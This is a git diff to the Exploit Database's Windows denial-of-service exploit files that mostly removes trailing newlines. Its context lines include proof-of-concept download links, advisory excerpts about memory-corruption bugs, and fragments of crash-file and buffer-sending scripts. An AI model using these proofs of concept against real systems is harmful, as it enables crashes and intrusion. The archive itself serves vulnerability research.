+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38793.zip \ No newline at end of file diff --git a/platforms/windows/dos/38794.txt b/platforms/windows/dos/38794.txt index 839b12f1b..3cdc55d61 100755 --- a/platforms/windows/dos/38794.txt +++ b/platforms/windows/dos/38794.txt @@ -6,5 +6,4 @@ When reproducing this issue in VMWare, it is necessary to remove VMWare tools. I --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38794.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38794.zip \ No newline at end of file diff --git a/platforms/windows/dos/38795.txt b/platforms/windows/dos/38795.txt index a046d16c9..8314dffa3 100755 --- a/platforms/windows/dos/38795.txt +++ b/platforms/windows/dos/38795.txt @@ -5,4 +5,4 @@ The attached testcase crashes Window 7 32-bit with Special Pool enabled on win32 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38795.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38795.zip \ No newline at end of file diff --git a/platforms/windows/dos/38796.txt b/platforms/windows/dos/38796.txt index 6e4a2ec5f..c3889af2a 100755 --- a/platforms/windows/dos/38796.txt +++ b/platforms/windows/dos/38796.txt @@ -4,5 +4,4 @@ The attached testcase triggers a use-after-free condition in win32k. The attache --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38796.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38796.zip \ No newline at end of file diff --git a/platforms/windows/dos/3883.html b/platforms/windows/dos/3883.html index 72bd3e3fd..bf95299b5 100755 --- a/platforms/windows/dos/3883.html +++ b/platforms/windows/dos/3883.html @@ -64,4 +64,4 @@ faultmon dump: </span></span> </code></pre> -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/windows/dos/3890.html b/platforms/windows/dos/3890.html index 07c7f722d..562a99875 100755 --- a/platforms/windows/dos/3890.html +++ b/platforms/windows/dos/3890.html @@ -50,4 +50,4 @@ Function GetUserRegisteredForBackend ( ) --> -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/windows/dos/3891.html b/platforms/windows/dos/3891.html index bb051585a..e4de4502b 100755 --- a/platforms/windows/dos/3891.html +++ b/platforms/windows/dos/3891.html @@ -53,4 +53,4 @@ Sub tryMe </span></span> </code></pre> -# milw0rm.com [2007-05-10] +# milw0rm.com [2007-05-10] \ No newline at end of file diff --git a/platforms/windows/dos/38916.html b/platforms/windows/dos/38916.html index 7c5f1ee8a..83c41a54f 100755 --- a/platforms/windows/dos/38916.html +++ b/platforms/windows/dos/38916.html @@ -55,4 +55,4 @@ <div id="oneUnArg">...</div> <div id="pHolder"></div> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/38934.txt b/platforms/windows/dos/38934.txt index 0f840f2db..8e8b76d50 100755 --- a/platforms/windows/dos/38934.txt +++ b/platforms/windows/dos/38934.txt @@ -5,5 +5,4 @@ If the numFonts field in the TTC header is greater than (SIZE_MAX+1) / 4, an int The TTC file format is described here https://www.microsoft.com/typography/otspec/otff.htm Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38934.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38934.zip \ No newline at end of file diff --git a/platforms/windows/dos/38978.py b/platforms/windows/dos/38978.py index 9ddde76a7..58908d1c1 100755 --- a/platforms/windows/dos/38978.py +++ b/platforms/windows/dos/38978.py @@ -89,4 +89,4 @@ def main(): if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/dos/38979.py b/platforms/windows/dos/38979.py index 732727959..00f9027ba 100755 --- a/platforms/windows/dos/38979.py +++ b/platforms/windows/dos/38979.py @@ -112,4 +112,4 @@ def main(): if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/dos/3898.html b/platforms/windows/dos/3898.html index 4e4e2d519..a63a7ecbb 100755 --- a/platforms/windows/dos/3898.html +++ b/platforms/windows/dos/3898.html @@ -96,4 +96,4 @@ Sub DeleteProfile ( --> -# milw0rm.com [2007-05-11] +# milw0rm.com [2007-05-11] \ No newline at end of file diff --git a/platforms/windows/dos/38980.py b/platforms/windows/dos/38980.py index 45110ba5d..83625dbf6 100755 --- a/platforms/windows/dos/38980.py +++ b/platforms/windows/dos/38980.py @@ -112,4 +112,4 @@ def main(): if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/dos/39019.txt b/platforms/windows/dos/39019.txt index 7c36158a8..f45186f57 100755 --- a/platforms/windows/dos/39019.txt +++ b/platforms/windows/dos/39019.txt @@ -44,5 +44,4 @@ my_text3.setTextFormat(my_format); A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39019.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39019.zip \ No newline at end of file diff --git a/platforms/windows/dos/39020.txt b/platforms/windows/dos/39020.txt index 5b857b8a3..891f088a3 100755 --- a/platforms/windows/dos/39020.txt +++ b/platforms/windows/dos/39020.txt @@ -45,5 +45,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39020.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39020.zip \ No newline at end of file diff --git a/platforms/windows/dos/39021.txt b/platforms/windows/dos/39021.txt index cba340404..2aabb403f 100755 --- a/platforms/windows/dos/39021.txt +++ b/platforms/windows/dos/39021.txt @@ -17,5 +17,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39021.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39021.zip \ No newline at end of file diff --git a/platforms/windows/dos/39022.txt b/platforms/windows/dos/39022.txt index 09adf56ee..1c8f74e38 100755 --- a/platforms/windows/dos/39022.txt +++ b/platforms/windows/dos/39022.txt @@ -43,5 +43,4 @@ A sample swf and fla is attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39022.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39022.zip \ No newline at end of file diff --git a/platforms/windows/dos/39025.txt b/platforms/windows/dos/39025.txt index 4c0c4ccfa..9c8a6c6e0 100755 --- a/platforms/windows/dos/39025.txt +++ b/platforms/windows/dos/39025.txt @@ -5,5 +5,4 @@ The attached PoC triggers a null pointer vulnerability in OffsetChildren on Wind Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39025.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39025.zip \ No newline at end of file diff --git a/platforms/windows/dos/39040.txt b/platforms/windows/dos/39040.txt index 5d5b87376..bc6e6b1f6 100755 --- a/platforms/windows/dos/39040.txt +++ b/platforms/windows/dos/39040.txt @@ -21,5 +21,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39040.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39040.zip \ No newline at end of file diff --git a/platforms/windows/dos/39041.txt b/platforms/windows/dos/39041.txt index 585b809ee..0ac343e3e 100755 --- a/platforms/windows/dos/39041.txt +++ b/platforms/windows/dos/39041.txt @@ -22,5 +22,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39041.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39041.zip \ No newline at end of file diff --git a/platforms/windows/dos/39042.txt b/platforms/windows/dos/39042.txt index 7fbea1ba4..1471bafd1 100755 --- a/platforms/windows/dos/39042.txt +++ b/platforms/windows/dos/39042.txt @@ -26,5 +26,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39042.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39042.zip \ No newline at end of file diff --git a/platforms/windows/dos/39044.txt b/platforms/windows/dos/39044.txt index e6630fe25..d8219c867 100755 --- a/platforms/windows/dos/39044.txt +++ b/platforms/windows/dos/39044.txt @@ -28,5 +28,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39044.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39044.zip \ No newline at end of file diff --git a/platforms/windows/dos/39045.txt b/platforms/windows/dos/39045.txt index c129fba49..23237b329 100755 --- a/platforms/windows/dos/39045.txt +++ b/platforms/windows/dos/39045.txt @@ -28,5 +28,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39045.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39045.zip \ No newline at end of file diff --git a/platforms/windows/dos/39046.txt b/platforms/windows/dos/39046.txt index fe9dec142..44b73f44b 100755 --- a/platforms/windows/dos/39046.txt +++ b/platforms/windows/dos/39046.txt @@ -30,5 +30,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39046.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39046.zip \ No newline at end of file diff --git a/platforms/windows/dos/39047.txt b/platforms/windows/dos/39047.txt index 4bdb47025..00f7361ba 100755 --- a/platforms/windows/dos/39047.txt +++ b/platforms/windows/dos/39047.txt @@ -22,5 +22,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39047.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39047.zip \ No newline at end of file diff --git a/platforms/windows/dos/39048.txt b/platforms/windows/dos/39048.txt index e9f3c4e52..9f40c1973 100755 --- a/platforms/windows/dos/39048.txt +++ b/platforms/windows/dos/39048.txt @@ -23,5 +23,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39048.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39048.zip \ No newline at end of file diff --git a/platforms/windows/dos/39049.txt b/platforms/windows/dos/39049.txt index 1844179d4..e8aa9d933 100755 --- a/platforms/windows/dos/39049.txt +++ b/platforms/windows/dos/39049.txt @@ -29,5 +29,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39049.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39049.zip \ No newline at end of file diff --git a/platforms/windows/dos/39050.txt b/platforms/windows/dos/39050.txt index dbf349586..ab1ae657f 100755 --- a/platforms/windows/dos/39050.txt +++ b/platforms/windows/dos/39050.txt @@ -20,5 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39050.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39050.zip \ No newline at end of file diff --git a/platforms/windows/dos/39051.txt b/platforms/windows/dos/39051.txt index 002080942..31f6aedf5 100755 --- a/platforms/windows/dos/39051.txt +++ b/platforms/windows/dos/39051.txt @@ -20,5 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39051.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39051.zip \ No newline at end of file diff --git a/platforms/windows/dos/39052.txt b/platforms/windows/dos/39052.txt index cf8ff4eba..a45a1d57e 100755 --- a/platforms/windows/dos/39052.txt +++ b/platforms/windows/dos/39052.txt @@ -20,5 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39052.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39052.zip \ No newline at end of file diff --git a/platforms/windows/dos/39053.txt b/platforms/windows/dos/39053.txt index 15748dc0d..9a80072e4 100755 --- a/platforms/windows/dos/39053.txt +++ b/platforms/windows/dos/39053.txt @@ -20,5 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39053.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39053.zip \ No newline at end of file diff --git a/platforms/windows/dos/39054.txt b/platforms/windows/dos/39054.txt index e897a5a94..c0dc59c51 100755 --- a/platforms/windows/dos/39054.txt +++ b/platforms/windows/dos/39054.txt @@ -25,5 +25,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39054.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39054.zip \ No newline at end of file diff --git a/platforms/windows/dos/39055.txt b/platforms/windows/dos/39055.txt index dfc236bdd..7229b8058 100755 --- a/platforms/windows/dos/39055.txt +++ b/platforms/windows/dos/39055.txt @@ -20,5 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39055.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39055.zip \ No newline at end of file diff --git a/platforms/windows/dos/39056.txt b/platforms/windows/dos/39056.txt index fb16cbad7..9ffbc8dc5 100755 --- a/platforms/windows/dos/39056.txt +++ b/platforms/windows/dos/39056.txt @@ -23,5 +23,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39056.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39056.zip \ No newline at end of file diff --git a/platforms/windows/dos/3910.html b/platforms/windows/dos/3910.html index 5d63ef5e9..413f78a28 100755 --- a/platforms/windows/dos/3910.html +++ b/platforms/windows/dos/3910.html @@ -32,4 +32,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-12] +# milw0rm.com [2007-05-12] \ No newline at end of file diff --git a/platforms/windows/dos/39103.txt b/platforms/windows/dos/39103.txt index 0da054671..481bb31a4 100755 --- a/platforms/windows/dos/39103.txt +++ b/platforms/windows/dos/39103.txt @@ -163,4 +163,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/dos/39144.html b/platforms/windows/dos/39144.html index 54ba0efc5..a06fe013f 100755 --- a/platforms/windows/dos/39144.html +++ b/platforms/windows/dos/39144.html @@ -32,4 +32,4 @@ </head> <body onload='testcase();'> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/39158.txt b/platforms/windows/dos/39158.txt index cc3656f91..d37bf31eb 100755 --- a/platforms/windows/dos/39158.txt +++ b/platforms/windows/dos/39158.txt @@ -45,4 +45,4 @@ This exception may be expected and handled. ============================================================== Regards, -Vishnu Raju. +Vishnu Raju. \ No newline at end of file diff --git a/platforms/windows/dos/3917.html b/platforms/windows/dos/3917.html index 378ee1950..24b1e08a4 100755 --- a/platforms/windows/dos/3917.html +++ b/platforms/windows/dos/3917.html @@ -38,4 +38,4 @@ </script></span></span> </code></pre> -# milw0rm.com [2007-05-13] +# milw0rm.com [2007-05-13] \ No newline at end of file diff --git a/platforms/windows/dos/39180.pl b/platforms/windows/dos/39180.pl index 113640202..a16125260 100755 --- a/platforms/windows/dos/39180.pl +++ b/platforms/windows/dos/39180.pl @@ -11,4 +11,4 @@ data outfile = file("poc.flv", 'wb') outfile.write(data) outfile.close() -print "Created Poc" +print "Created Poc" \ No newline at end of file diff --git a/platforms/windows/dos/39181.py b/platforms/windows/dos/39181.py index 7aac68ac1..1c1846688 100755 --- a/platforms/windows/dos/39181.py +++ b/platforms/windows/dos/39181.py @@ -21,4 +21,4 @@ data = header1+pattern1+header2+pattern2 outfile = file("poc.avi", 'wb') outfile.write(data) outfile.close() -print "Created Poc" +print "Created Poc" \ No newline at end of file diff --git a/platforms/windows/dos/39183.py b/platforms/windows/dos/39183.py index da13f075a..8ab66d6fa 100755 --- a/platforms/windows/dos/39183.py +++ b/platforms/windows/dos/39183.py @@ -11,4 +11,4 @@ data outfile = file("poc.wav", 'wb') outfile.write(data) outfile.close() -print "Created Poc" +print "Created Poc" \ No newline at end of file diff --git a/platforms/windows/dos/39208.c b/platforms/windows/dos/39208.c index 21043be2d..d4d19ae2c 100755 --- a/platforms/windows/dos/39208.c +++ b/platforms/windows/dos/39208.c @@ -77,4 +77,4 @@ InjectTouchInput(1, &Contact); } return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/3921.html b/platforms/windows/dos/3921.html index 06bd4afc4..1c83070d8 100755 --- a/platforms/windows/dos/3921.html +++ b/platforms/windows/dos/3921.html @@ -57,4 +57,4 @@ faultmon dump: </span></span> </code></pre> -# milw0rm.com [2007-05-14] +# milw0rm.com [2007-05-14] \ No newline at end of file diff --git a/platforms/windows/dos/39216.py b/platforms/windows/dos/39216.py index 01215fedb..73c17e3a1 100755 --- a/platforms/windows/dos/39216.py +++ b/platforms/windows/dos/39216.py @@ -33,5 +33,4 @@ crash = "\x41"*199289 #B0F exp = hdr+hcr+hdr+val+hdr+hcr+hdr+oth+crash+oth2 file = open("r3z4.csv", "w") file.write(exp) -file.close() - +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/39220.txt b/platforms/windows/dos/39220.txt index 063375f5a..b924f41b3 100755 --- a/platforms/windows/dos/39220.txt +++ b/platforms/windows/dos/39220.txt @@ -4,5 +4,4 @@ There is a use-after-free that appears to be related to rendering the display ba Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39220.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39220.zip \ No newline at end of file diff --git a/platforms/windows/dos/39232.txt b/platforms/windows/dos/39232.txt index a708b77b1..f8af99e07 100755 --- a/platforms/windows/dos/39232.txt +++ b/platforms/windows/dos/39232.txt @@ -44,5 +44,4 @@ The DeviceMoniker::Load() method should limit the user supplied size to sane val Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39232.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39232.zip \ No newline at end of file diff --git a/platforms/windows/dos/39233.txt b/platforms/windows/dos/39233.txt index 95623d281..687d55308 100755 --- a/platforms/windows/dos/39233.txt +++ b/platforms/windows/dos/39233.txt @@ -46,5 +46,4 @@ This DLL load can be triggered without user interaction with the following RTF d Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39233.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39233.zip \ No newline at end of file diff --git a/platforms/windows/dos/3926.py b/platforms/windows/dos/3926.py index 7e70b3168..d9bdc1d91 100755 --- a/platforms/windows/dos/3926.py +++ b/platforms/windows/dos/3926.py @@ -84,4 +84,4 @@ else: # u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st. -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/windows/dos/39274.py b/platforms/windows/dos/39274.py index 2bac65a6e..6bbb5c86e 100755 --- a/platforms/windows/dos/39274.py +++ b/platforms/windows/dos/39274.py @@ -29,4 +29,4 @@ s.recv(1024) s.send( buffer + '\r\n') print '[+] Buffer sent' -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/3929.txt b/platforms/windows/dos/3929.txt index 95beb32e8..0c7650b86 100755 --- a/platforms/windows/dos/3929.txt +++ b/platforms/windows/dos/3929.txt @@ -28,4 +28,4 @@ PoC: </channel> </rss> -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/windows/dos/3930.txt b/platforms/windows/dos/3930.txt index c7b74481b..7e91d95e5 100755 --- a/platforms/windows/dos/3930.txt +++ b/platforms/windows/dos/3930.txt @@ -25,4 +25,4 @@ PoC: </channel> </rss> -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/windows/dos/39329.py b/platforms/windows/dos/39329.py index 50ed23e86..73ce42374 100755 --- a/platforms/windows/dos/39329.py +++ b/platforms/windows/dos/39329.py @@ -26,4 +26,4 @@ junk2 = "D"*20000 file=open("Exploit.m3u","w") file.write(junk) file.close() -#EOF +#EOF \ No newline at end of file diff --git a/platforms/windows/dos/39331.pl b/platforms/windows/dos/39331.pl index 3489ccb32..b0ac35b24 100755 --- a/platforms/windows/dos/39331.pl +++ b/platforms/windows/dos/39331.pl @@ -31,5 +31,4 @@ PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error"; } } -exit; - +exit; \ No newline at end of file diff --git a/platforms/windows/dos/39353.txt b/platforms/windows/dos/39353.txt index 6e4a3e77f..b99e463d2 100755 --- a/platforms/windows/dos/39353.txt +++ b/platforms/windows/dos/39353.txt @@ -61,4 +61,4 @@ An heap memory corruption occured when VLC parsed an malformed MPEG-4 file that http://protekresearchlab.com/exploits/COSIG-2016-03.mp4 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39353.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/3937.html b/platforms/windows/dos/3937.html index 767e1f356..296abb3e5 100755 --- a/platforms/windows/dos/3937.html +++ b/platforms/windows/dos/3937.html @@ -29,4 +29,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/windows/dos/3939.py b/platforms/windows/dos/3939.py index 02472ea3f..a0ccaa0ab 100755 --- a/platforms/windows/dos/3939.py +++ b/platforms/windows/dos/3939.py @@ -109,4 +109,4 @@ if __name__=="__main__": GetCALoggerPort(target) -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/windows/dos/39393.txt b/platforms/windows/dos/39393.txt index 217b864ae..5f0d1624e 100755 --- a/platforms/windows/dos/39393.txt +++ b/platforms/windows/dos/39393.txt @@ -81,4 +81,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp <UIList/> <Layout/> </Project> -</DAQMaster> +</DAQMaster> \ No newline at end of file diff --git a/platforms/windows/dos/39395.txt b/platforms/windows/dos/39395.txt index 8ad9627b7..c0d5631f6 100755 --- a/platforms/windows/dos/39395.txt +++ b/platforms/windows/dos/39395.txt @@ -68,4 +68,4 @@ on vulnerable installations of WPS. User interaction is required to exploit this http://protekresearchlab.com/exploits/COSIG-2016-04.ppt https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39395.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/39396.txt b/platforms/windows/dos/39396.txt index cbaff972e..0163f92ce 100755 --- a/platforms/windows/dos/39396.txt +++ b/platforms/windows/dos/39396.txt @@ -70,4 +70,4 @@ data section causing a stackbase memory corruption. http://protekresearchlab.com/exploits/COSIG-2016-05.doc https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39396.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/39397.txt b/platforms/windows/dos/39397.txt index 65057291d..22fc27d58 100755 --- a/platforms/windows/dos/39397.txt +++ b/platforms/windows/dos/39397.txt @@ -68,4 +68,4 @@ By providing a malformed .ppt file, an attacker can cause an memory corruption b http://protekresearchlab.com/exploits/COSIG-2016-06.ppt https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39397.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/39398.txt b/platforms/windows/dos/39398.txt index 30b81133a..587770424 100755 --- a/platforms/windows/dos/39398.txt +++ b/platforms/windows/dos/39398.txt @@ -67,4 +67,4 @@ An attacker could leverage this to execute arbitrary code under the context of t http://protekresearchlab.com/exploits/COSIG-2016-07.xlsx https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39398.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/3940.py b/platforms/windows/dos/3940.py index 7282f8867..bb3b818c5 100755 --- a/platforms/windows/dos/3940.py +++ b/platforms/windows/dos/3940.py @@ -127,4 +127,4 @@ if __name__=="__main__": GetMediaSvrPort(target) -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/windows/dos/39400.pl b/platforms/windows/dos/39400.pl index 3a3569aee..0f7001d81 100755 --- a/platforms/windows/dos/39400.pl +++ b/platforms/windows/dos/39400.pl @@ -13,4 +13,4 @@ open($FILE,">$file"); print $FILE $junk; print "\nCrash.fax File Created successfully\n"; print "\ Oumaima & Tarta (Ahmadso best friend)\n"; -close($FILE); +close($FILE); \ No newline at end of file diff --git a/platforms/windows/dos/39403.py b/platforms/windows/dos/39403.py index 29870cee8..039bc97c2 100755 --- a/platforms/windows/dos/39403.py +++ b/platforms/windows/dos/39403.py @@ -87,4 +87,4 @@ print "File exploit.app created!\n" # # PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip # https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39403.zip -# +# \ No newline at end of file diff --git a/platforms/windows/dos/39428.txt b/platforms/windows/dos/39428.txt index 260fe9835..54716d077 100755 --- a/platforms/windows/dos/39428.txt +++ b/platforms/windows/dos/39428.txt @@ -26,5 +26,4 @@ POTPLAYER has buffer overflow in png parser of image of MP3 offset 5B . Crash is because of '\x22' at offset 5B Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39428.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39428.zip \ No newline at end of file diff --git a/platforms/windows/dos/39429.txt b/platforms/windows/dos/39429.txt index c7a3bf085..c22da7561 100755 --- a/platforms/windows/dos/39429.txt +++ b/platforms/windows/dos/39429.txt @@ -67,4 +67,4 @@ http://protekresearchlab.com/exploits/COSIG-2016-08-2.png https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39429.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/39430.txt b/platforms/windows/dos/39430.txt index 9fc83863f..6f9b48b94 100755 --- a/platforms/windows/dos/39430.txt +++ b/platforms/windows/dos/39430.txt @@ -66,4 +66,4 @@ http://protekresearchlab.com/exploits/COSIG-2016-09-2.png https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39430.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/39431.txt b/platforms/windows/dos/39431.txt index 03052cf4e..435bd183d 100755 --- a/platforms/windows/dos/39431.txt +++ b/platforms/windows/dos/39431.txt @@ -63,4 +63,4 @@ http://protekresearchlab.com/exploits/COSIG-2016-10.iff https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39431.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/39444.txt b/platforms/windows/dos/39444.txt index cf4c8ab92..0f60305da 100755 --- a/platforms/windows/dos/39444.txt +++ b/platforms/windows/dos/39444.txt @@ -23,4 +23,4 @@ Alternate Pic Viewer crashes on a faulty PGM image file . Faulty PGM file is attached as POC Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ \ No newline at end of file diff --git a/platforms/windows/dos/39452.txt b/platforms/windows/dos/39452.txt index 21baa2f8a..61a84e4ff 100755 --- a/platforms/windows/dos/39452.txt +++ b/platforms/windows/dos/39452.txt @@ -102,4 +102,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/dos/39470.py b/platforms/windows/dos/39470.py index 6276088fc..1ef4a9ddd 100755 --- a/platforms/windows/dos/39470.py +++ b/platforms/windows/dos/39470.py @@ -35,4 +35,4 @@ else: username=sys.argv[2] passwd=sys.argv[3] start(hostname,username,passwd) - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/dos/39471.txt b/platforms/windows/dos/39471.txt index eb1cd9700..45c25cb35 100755 --- a/platforms/windows/dos/39471.txt +++ b/platforms/windows/dos/39471.txt @@ -59,4 +59,4 @@ active=1 <!--Buffer 1:block--> """ f.write(payload) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/39472.txt b/platforms/windows/dos/39472.txt index d6b19cbf4..e81d3bacd 100755 --- a/platforms/windows/dos/39472.txt +++ b/platforms/windows/dos/39472.txt @@ -89,4 +89,4 @@ c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", """ f.write(payload) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/39475.py b/platforms/windows/dos/39475.py index 9463ceef3..d3fa24890 100755 --- a/platforms/windows/dos/39475.py +++ b/platforms/windows/dos/39475.py @@ -75,4 +75,4 @@ if __name__ == '__main__': inputbuffer_size, outputbuffer, outputbuffer_size - ) + ) \ No newline at end of file diff --git a/platforms/windows/dos/39509.txt b/platforms/windows/dos/39509.txt index 65283b7c4..03e1f9dea 100755 --- a/platforms/windows/dos/39509.txt +++ b/platforms/windows/dos/39509.txt @@ -57,4 +57,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5309.php PoC: http://zeroscience.mk/codes/poc5309.pm4.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39509.zip 